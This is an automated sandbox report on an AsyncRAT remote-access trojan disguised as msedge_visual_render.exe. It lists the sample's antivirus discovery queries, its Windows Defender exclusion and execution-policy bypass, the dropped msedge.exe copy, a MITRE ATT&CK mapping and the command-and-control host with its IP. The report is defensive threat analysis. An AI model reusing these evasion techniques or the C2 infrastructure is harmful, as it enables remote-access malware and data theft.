              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\msedge.exeQueries volume information: C:\Users\user\AppData\Roaming\msedge.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\msedge.exeQueries volume information: C:\Users\user\AppData\Roaming\msedge.exe VolumeInformation
              Source: C:\Users\user\Desktop\msedge_visual_render.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: msedge_visual_render.exe, 00000000.00000002.3340935332.000000001B580000.00000004.00000020.00020000.00000000.sdmp, msedge_visual_render.exe, 00000000.00000002.3340935332.000000001B613000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: msedge_visual_render.exe, 00000000.00000002.3340935332.000000001B613000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ws Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\msedge_visual_render.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\msedge_visual_render.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\msedge_visual_render.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\msedge_visual_render.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\msedge_visual_render.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\msedge_visual_render.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\msedge_visual_render.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\msedge_visual_render.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              Source: Yara match | File source: msedge_visual_render.exe, type: SAMPLE
              Source: Yara match | File source: 0.0.msedge_visual_render.exe.3f0000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000000.00000002.3338785172.0000000012701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000000.2055237317.00000000003F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: msedge_visual_render.exe PID: 1992, type: MEMORYSTR
              Source: Yara match | File source: C:\Users\user\AppData\Roaming\msedge.exe, type: DROPPED

              Remote Access Functionality

              Source: Yara match | File source: msedge_visual_render.exe, type: SAMPLE
              Source: Yara match | File source: 0.0.msedge_visual_render.exe.3f0000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000000.00000002.3338785172.0000000012701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000000.2055237317.00000000003F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: msedge_visual_render.exe PID: 1992, type: MEMORYSTR
              Source: Yara match | File source: C:\Users\user\AppData\Roaming\msedge.exe, type: DROPPED

              MITRE ATT&CK Matrix (one line per tactic, cells listed in matrix row order; the numeric prefixes are carried over from the report's matrix cells):

              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
              Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
              Execution: 11 Windows Management Instrumentation; 1 PowerShell; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
              Persistence: 21 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
              Privilege Escalation: 11 Process Injection; 21 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
              Defense Evasion: 1 Masquerading; 11 Disable or Modify Tools; 131 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Obfuscated Files or Information; 2 Software Packing; 1 DLL Side-Loading
              Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
              Discovery: 221 Security Software Discovery; 1 Process Discovery; 131 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 13 System Information Discovery; Remote System Discovery; System Owner/User Discovery
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
              Collection: 11 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
              Command and Control: 1 Encrypted Channel; 1 Non-Standard Port; 1 Non-Application Layer Protocol; 11 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
              Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
              Behavior Graph ID: 1556740 | Sample: msedge_visual_render.exe | Startdate: 15/11/2024 | Architecture: WINDOWS | Score: 100

              Start (node 2):
                DNS/IP: 23.ip.gl.ply.gg
                Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures
                Started: msedge_visual_render.exe (node 8, counts 1 5); msedge.exe (node 13); msedge.exe (node 15)

              msedge_visual_render.exe (node 8):
                DNS/IP: 23.ip.gl.ply.gg 147.185.221.23, 49862, 49908, 49950 SALSGIVERUS United States
                Dropped: C:\Users\user\AppData\Roaming\msedge.exe, PE32
                Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Protects its processes via BreakOnTermination flag; Bypasses PowerShell execution policy; Adds a directory exclusion to Windows Defender
                Started: powershell.exe (node 17, count 23); powershell.exe (node 20, count 23); powershell.exe (node 22, count 23); powershell.exe (node 24, count 21)

              msedge.exe (node 13):
                Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file

              powershell.exe (node 17):
                Signatures: Loading BitLocker PowerShell Module
                Started: conhost.exe (node 26)

              powershell.exe (nodes 20, 22, 24):
                Started: conhost.exe (nodes 28, 30, 32 respectively)

              Source | Detection | Scanner | Label | Link
              msedge_visual_render.exe | 74% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT | -
              msedge_visual_render.exe | 100% | Joe Sandbox ML | - | -
              Source | Detection | Scanner | Label | Link
              C:\Users\user\AppData\Roaming\msedge.exe | 100% | Joe Sandbox ML | - | -
              C:\Users\user\AppData\Roaming\msedge.exe | 74% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT | -
              No Antivirus matches
              No Antivirus matches
              Source | Detection | Scanner | Label | Link
              https://www.verisign. | 0% | Avira URL Cloud | safe | -
              https://go.m | 0% | Avira URL Cloud | safe | -
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              23.ip.gl.ply.gg | 147.185.221.23 | true | false | - | high
              Name | Malicious | Antivirus Detection | Reputation
              23.ip.gl.ply.gg | false | - | high
              Name | Source | Malicious | Antivirus Detection | Reputation
              http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2136913212.000001CFE44C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2213548272.00000184DA741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2344287876.0000020A23251000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2509527008.000002C7F46F0000.00000004.00000800.00020000.00000000.sdmp | false | - | high
              http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000A.00000002.2396438363.000002C7E48A9000.00000004.00000800.00020000.00000000.sdmp | false | - | high
              http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000002.00000002.2122069386.000001CFD4679000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2168718628.00000184CA8F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2259166369.0000020A13408000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2396438363.000002C7E48A9000.00000004.00000800.00020000.00000000.sdmp | false | - | high
              http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000A.00000002.2396438363.000002C7E48A9000.00000004.00000800.00020000.00000000.sdmp | false | - | high
              http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000002.00000002.2122069386.000001CFD4679000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2168718628.00000184CA8F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2259166369.0000020A13408000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2396438363.000002C7E48A9000.00000004.00000800.00020000.00000000.sdmp | false | - | high
              http://www.micom/pkiops/Docs/ry.htm0 | powershell.exe, 00000005.00000002.2224332852.00000184E2AF8000.00000004.00000020.00020000.00000000.sdmp | false | - | high
              https://contoso.com/ | powershell.exe, 0000000A.00000002.2509527008.000002C7F46F0000.00000004.00000800.00020000.00000000.sdmp | false | - | high
              https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2136913212.000001CFE44C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2213548272.00000184DA741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2344287876.0000020A23251000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2509527008.000002C7F46F0000.00000004.00000800.00020000.00000000.sdmp | false | - | high
              http://www.microsoft.co | powershell.exe, 00000008.00000002.2356985034.0000020A2B57F000.00000004.00000020.00020000.00000000.sdmp | false | - | high
              https://contoso.com/License | powershell.exe, 0000000A.00000002.2509527008.000002C7F46F0000.00000004.00000800.00020000.00000000.sdmp | false | - | high
              http://crl.mic | powershell.exe, 00000008.00000002.2362125678.0000020A2B89B000.00000004.00000020.00020000.00000000.sdmp | false | - | high
              https://contoso.com/Icon | powershell.exe, 0000000A.00000002.2509527008.000002C7F46F0000.00000004.00000800.00020000.00000000.sdmp | false | - | high
              http://crl.micft.cMicRosof | powershell.exe, 00000008.00000002.2362125678.0000020A2B89B000.00000004.00000020.00020000.00000000.sdmp | false | - | high
              https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.2122069386.000001CFD4451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2168718628.00000184CA6D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2259166369.0000020A131E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2396438363.000002C7E4681000.00000004.00000800.00020000.00000000.sdmp | false | - | high
              https://www.verisign. | powershell.exe, 0000000A.00000002.2526355143.000002C7FC9E2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | msedge_visual_render.exe, 00000000.00000002.3303162945.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2122069386.000001CFD4451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2168718628.00000184CA6D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2259166369.0000020A131E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2396438363.000002C7E4681000.00000004.00000800.00020000.00000000.sdmp | false
                                                high
                                                https://go.mpowershell.exe, 00000002.00000002.2142783019.000001CFECB60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://github.com/Pester/Pesterpowershell.exe, 0000000A.00000002.2396438363.000002C7E48A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://crl.microspowershell.exe, 00000008.00000002.2360202768.0000020A2B710000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
IP | Domain | Country | ASN | ASN Name | Malicious
147.185.221.23 | 23.ip.gl.ply.gg | United States | 12087 | SALSGIVERUS | false
                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1556740
                                                    Start date and time:2024-11-15 22:09:10 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 6m 18s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:15
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:msedge_visual_render.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.evad.winEXE@15/20@1/1
                                                    EGA Information:
                                                    • Successful, ratio: 14.3%
                                                    HCA Information:
                                                    • Successful, ratio: 98%
                                                    • Number of executed functions: 62
                                                    • Number of non-executed functions: 6
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
